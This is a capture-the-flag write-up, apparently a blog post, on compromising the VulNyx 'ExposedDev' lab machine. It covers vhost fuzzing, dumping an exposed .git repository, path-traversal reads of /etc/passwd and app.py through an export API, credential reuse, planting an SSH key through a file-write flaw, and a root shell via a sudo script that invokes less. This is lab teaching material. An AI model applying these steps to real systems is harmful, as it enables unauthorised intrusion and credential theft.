1. Recon

Nmap showed 2 open ports:

nmap 192.168.100.43 -p-                
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

http has some hints, that user might be piersi and the ctf related to PHP

2. VHost Discovery

I could not find anything useful except /login page, but could not guess credentials. Then tried vhost fuzzing and found development

ffuf -u http://192.168.100.43/ -H "Host: FUZZ.exposeddev.nyx" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 178

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://192.168.100.43/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.exposeddev.nyx
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 178
________________________________________________

development [Status: 200, Size: 417, Words: 65, Lines: 15, Duration: 1ms]

3. `.git` Jackpot

Nothing in the page, tried many things and when I checked if .git exist, found it:

ffuf -u http://development.exposeddev.nyx/.git/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://development.exposeddev.nyx/.git/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200
________________________________________________

config [Status: 200, Size: 145, Words: 13, Lines: 9, Duration: 1ms]
index [Status: 200, Size: 886, Words: 3, Lines: 21, Duration: 3ms]
:: Progress: [4746/4746] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::Then downloaded git dumper from github and run:

Then downloaded git dumper from github and run:

git clone https://github.com/arthaud/git-dumper.git
cd git-dumper
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python3 git_dumper.py http://development.exposeddev.nyx/.git ./dev-repo

4. First Creds — And a Little API Abuse

After investigation, found admin:dIevInSiOlan credentials:

Used these to log in exposeddev.nyx/login and after tweaking found that i can download /etc/passwd changing the link

from http://exposeddev.nyx/api/export_chat?chat_name=Developing_Chat/chat_log.txt

to http://exposeddev.nyx/api/export_chat?chat_name=/etc/passwd

5. Local File Read → Source Code Loot

Found out there are piersi and debi users in the system. After some trial and error found http://exposeddev.nyx/api/export_chat?chat_name=Developing_Chat/../../app.py since piersi wrote in chat log that he is learning flask. And got password for database:

Logged in ssh with these credentials: piersi:MabEwReOmcpG!123

6. Chasing debi – Port Forwarding Fun

Get Abdulhamid’s stories in your inbox

Join Medium for free to get updates from this writer.

Logged in ssh to piersi with the password, but there was no user flag. It is clear that debi has it, so uploaded linpeas, tried pkexec but did not work then before giving up found out 3000 port is working for user debi:

ps aux | grep debi
debi         734  0.0  0.9  27392 19748 ?        Ss   18:25   0:00 /usr/bin/python3 /usr/local/bin/gunicorn -w 4 -b 127.0.0.1:3000 app:app
debi         906  0.0  2.3  58468 48016 ?        S    18:25   0:01 /usr/bin/python3 /usr/local/bin/gunicorn -w 4 -b 127.0.0.1:3000 app:app
debi         909  0.0  2.3  58468 48012 ?        S    18:25   0:01 /usr/bin/python3 /usr/local/bin/gunicorn -w 4 -b 127.0.0.1:3000 app:app
debi         912  0.0  2.3  58468 48040 ?        S    18:25   0:01 /usr/bin/python3 /usr/local/bin/gunicorn -w 4 -b 127.0.0.1:3000 app:app
debi         915  0.0  2.3  58468 48020 ?        S    18:25   0:01 /usr/bin/python3 /usr/local/bin/gunicorn -w 4 -b 127.0.0.1:3000 app:app
piersi     42777  0.0  0.0   6300   720 pts/0    S+   18:43   0:00 grep debi

then forwarded it:

ssh -L 9999:127.0.0.1:3000 piersi@192.168.100.43

On the web was nothing but login page, used credentials and this worked: debi:MabEwReOmcpG!123

7. No SSTI, But Arbitrary File Write

Tried SSTI, because on chat with piersi it was written that debi is struggling to understand how jinja works. But did not succeed. Then i tried to write file in /tmp and worked!

Couldn’t read, because it created by debi:

As you guessed , wrote my public ssh key to debi’s authorized users:

ssh ~/.ssh/id_rsa debi@192.168.100.43

— got user flag!

8. Privilege Escalation — “less” is More

Checked sudo perms:

User debi may run the following commands on exposeddev:
    (ALL) NOPASSWD: /usr/local/bin/status_notevault.sh

Contents of the script:

#!/bin/bash
/usr/bin/systemctl status NoteVault.service | /usr/bin/less

Here’s the deal:

Script runs less as root (because it’s run via sudo).
less lets you drop into a shell with !.
That shell inherits root privileges.

9. Root Time

sudo /usr/local/bin/status_notevault.sh

Inside less , I typed:

!/bin/bash

And just like that:

whoami
root

10. Lessons Learned

.git in production is basically a piñata for hackers.
If you expose file export features, people will try ../../../../etc/passwd.
Never underestimate the power of less. Sometimes less really is more.

#cybersecurity #vulnyx #less #git_dumper #ctf #writeup #walkthrough

VulNyx ExposedDev — Write-up